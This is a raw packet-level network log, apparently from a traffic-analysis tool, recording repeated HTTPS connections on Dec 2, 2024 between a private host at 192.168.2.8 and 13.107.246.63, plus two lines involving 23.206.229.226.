                                                                                                                                                                                                        Dec 2, 2024 07:38:59.325457096 CET4434986313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:59.325525045 CET49863443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:59.325695992 CET49863443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:59.325706959 CET4434986313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:59.328295946 CET4434985713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:59.328361034 CET4434985713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:59.328419924 CET49857443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:59.328556061 CET49857443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:59.328556061 CET49857443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:59.328573942 CET4434985713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:59.328587055 CET4434985713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:59.330971956 CET49864443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:59.331007004 CET4434986413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:59.331068993 CET49864443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:59.331222057 CET49864443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:59.331238031 CET4434986413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:59.956422091 CET4434986013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:59.957159996 CET49860443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:59.957192898 CET4434986013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:59.957724094 CET49860443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:59.957731962 CET4434986013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:00.400227070 CET4434986013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:00.400301933 CET4434986013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:00.400357008 CET49860443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:00.400585890 CET49860443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:00.400605917 CET4434986013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:00.400616884 CET49860443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:00.400624037 CET4434986013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:00.403839111 CET49865443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:00.403876066 CET4434986513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:00.403949976 CET49865443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:00.404122114 CET49865443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:00.404130936 CET4434986513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:00.928695917 CET4434986113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:00.930085897 CET49861443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:00.930119038 CET4434986113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:00.930560112 CET49861443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:00.930566072 CET4434986113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:00.940375090 CET4434986213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:00.941061020 CET49862443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:00.941080093 CET4434986213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:00.941771984 CET49862443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:00.941776991 CET4434986213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:01.106514931 CET4434986313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:01.107306957 CET49863443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:01.107336044 CET4434986313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:01.107820034 CET49863443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:01.107826948 CET4434986313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:01.122608900 CET4434986413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:01.123114109 CET49864443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:01.123136997 CET4434986413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:01.123572111 CET49864443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:01.123577118 CET4434986413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:01.372925043 CET4434986113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:01.373002052 CET4434986113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:01.373116016 CET49861443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:01.373425007 CET49861443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:01.373449087 CET4434986113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:01.373466015 CET49861443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:01.373471975 CET4434986113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:01.375245094 CET4434986213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:01.375320911 CET4434986213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:01.375402927 CET49862443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:01.375608921 CET49862443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:01.375631094 CET4434986213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:01.375643015 CET49862443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:01.375648975 CET4434986213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:01.377254009 CET49866443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:01.377288103 CET4434986613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:01.377367973 CET49866443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:01.377532005 CET49866443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:01.377546072 CET4434986613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:01.377834082 CET49867443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:01.377851963 CET4434986713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:01.377912045 CET49867443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:01.378057957 CET49867443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:01.378070116 CET4434986713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:01.550338984 CET4434986313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:01.550404072 CET4434986313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:01.550549984 CET49863443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:01.550791979 CET49863443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:01.550813913 CET4434986313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:01.550825119 CET49863443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:01.550832033 CET4434986313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:01.554344893 CET49868443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:01.554379940 CET4434986813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:01.554466963 CET49868443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:01.554682016 CET49868443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:01.554697037 CET4434986813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:01.566895962 CET4434986413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:01.566967010 CET4434986413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:01.567054987 CET49864443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:01.567212105 CET49864443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:01.567229033 CET4434986413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:01.567240953 CET49864443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:01.567245960 CET4434986413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:01.569935083 CET49869443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:01.569977999 CET4434986913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:01.570044994 CET49869443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:01.570163012 CET49869443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:01.570177078 CET4434986913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:02.250026941 CET4434986513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:02.253196955 CET49865443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:02.253213882 CET4434986513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:02.256544113 CET49865443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:02.256551027 CET4434986513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:02.704561949 CET4434986513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:02.704643011 CET4434986513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:02.704704046 CET49865443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:02.706450939 CET49865443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:02.706465960 CET4434986513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:02.706479073 CET49865443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:02.706484079 CET4434986513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:02.712516069 CET49870443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:02.712554932 CET4434987013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:02.712634087 CET49870443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:02.712790012 CET49870443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:02.712802887 CET4434987013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.182976007 CET4434986713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.182991982 CET4434986613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.183716059 CET49866443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.183720112 CET49867443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.183728933 CET4434986613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.183749914 CET4434986713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.184253931 CET49866443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.184258938 CET4434986613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.184281111 CET49867443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.184287071 CET4434986713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.317631006 CET4434986913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.318233967 CET49869443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.318253994 CET4434986913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.318762064 CET49869443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.318766117 CET4434986913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.402049065 CET4434986813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.402667999 CET49868443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.402683020 CET4434986813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.403212070 CET49868443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.403215885 CET4434986813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.580404997 CET4434982523.206.229.226192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.580462933 CET49825443192.168.2.823.206.229.226
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.627276897 CET4434986613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.627361059 CET4434986613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.627418995 CET49866443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.627686977 CET49866443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.627702951 CET4434986613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.627712965 CET49866443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.627718925 CET4434986613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.631145954 CET49871443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.631187916 CET4434987113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.631295919 CET49871443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.631475925 CET49871443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.631489038 CET4434987113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.698817015 CET4434986713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.698914051 CET4434986713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.698968887 CET49867443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.699204922 CET49867443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.699220896 CET4434986713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.699232101 CET49867443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.699237108 CET4434986713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.703144073 CET49872443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.703167915 CET4434987213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.703222036 CET49872443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.703439951 CET49872443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.703449965 CET4434987213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.753078938 CET4434986913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.753140926 CET4434986913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.753201962 CET49869443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.753489971 CET49869443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.753508091 CET4434986913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.753523111 CET49869443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.753529072 CET4434986913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.756917953 CET49873443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.756957054 CET4434987313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.757173061 CET49873443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.757366896 CET49873443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.757379055 CET4434987313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.845887899 CET4434986813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.845947027 CET4434986813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.846075058 CET49868443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.846381903 CET49868443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.846381903 CET49868443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.846409082 CET4434986813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.846412897 CET4434986813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.849941015 CET49874443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.849970102 CET4434987413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.850037098 CET49874443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.850263119 CET49874443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:03.850270987 CET4434987413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:04.493248940 CET4434987013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:04.494235992 CET49870443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:04.494262934 CET4434987013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:04.494849920 CET49870443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:04.494856119 CET4434987013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:04.938647032 CET4434987013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:04.938718081 CET4434987013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:04.938790083 CET49870443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:04.939018011 CET49870443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:04.939018011 CET49870443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:04.939038038 CET4434987013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:04.939047098 CET4434987013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:04.943212032 CET49875443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:04.943245888 CET4434987513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:04.943578959 CET49875443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:04.943731070 CET49875443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:04.943744898 CET4434987513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:05.437352896 CET4434987113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:05.444711924 CET49871443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:05.444730997 CET4434987113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:05.445214033 CET49871443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:05.445219040 CET4434987113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:05.483042002 CET4434987213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:05.483650923 CET49872443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:05.483675003 CET4434987213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:05.484219074 CET49872443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:05.484225035 CET4434987213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:05.537940979 CET4434987313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:05.538605928 CET49873443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:05.538629055 CET4434987313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:05.539433956 CET49873443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:05.539442062 CET4434987313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:05.718626976 CET4434987413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:05.721059084 CET49874443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:05.721084118 CET4434987413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:05.721560001 CET49874443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:05.721570015 CET4434987413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:05.881786108 CET4434987113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:05.881861925 CET4434987113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:05.881975889 CET49871443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:05.882189035 CET49871443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:05.882203102 CET4434987113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:05.882215977 CET49871443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:05.882221937 CET4434987113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:05.885334015 CET49876443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:05.885355949 CET4434987613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:05.885428905 CET49876443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:05.885610104 CET49876443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:05.885622978 CET4434987613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:05.928564072 CET4434987213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:05.928636074 CET4434987213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:05.928741932 CET49872443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:05.928975105 CET49872443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:05.928988934 CET4434987213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:05.929001093 CET49872443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:05.929007053 CET4434987213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:05.932661057 CET49877443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:05.932683945 CET4434987713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:05.932771921 CET49877443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:05.932934046 CET49877443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:05.932944059 CET4434987713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:05.983042002 CET4434987313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:05.983099937 CET4434987313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:05.983223915 CET49873443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:05.983490944 CET49873443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:05.983499050 CET4434987313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:05.983509064 CET49873443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:05.983515024 CET4434987313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:05.986615896 CET49878443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:05.986639977 CET4434987813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:05.986740112 CET49878443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:05.986877918 CET49878443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:05.986888885 CET4434987813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:06.179344893 CET4434987413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:06.179420948 CET4434987413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:06.179505110 CET49874443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:06.179785013 CET49874443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:06.179797888 CET4434987413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:06.179811001 CET49874443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:06.179816008 CET4434987413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:06.183306932 CET49879443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:06.183345079 CET4434987913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:06.183430910 CET49879443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:06.183608055 CET49879443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:06.183621883 CET4434987913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:06.725509882 CET4434987513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:06.726097107 CET49875443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:06.726119995 CET4434987513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:06.726598024 CET49875443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:06.726603985 CET4434987513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:07.181029081 CET4434987513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:07.181107044 CET4434987513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:07.181185961 CET49875443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:07.186136007 CET49875443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:07.186157942 CET4434987513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:39:07.186170101 CET49875443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:39:07.186176062 CET4434987513.107.246.63192.168.2.8
